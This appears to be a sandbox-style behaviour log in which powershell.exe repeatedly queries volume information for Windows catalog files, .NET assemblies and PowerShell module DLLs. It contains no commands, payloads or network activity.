Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
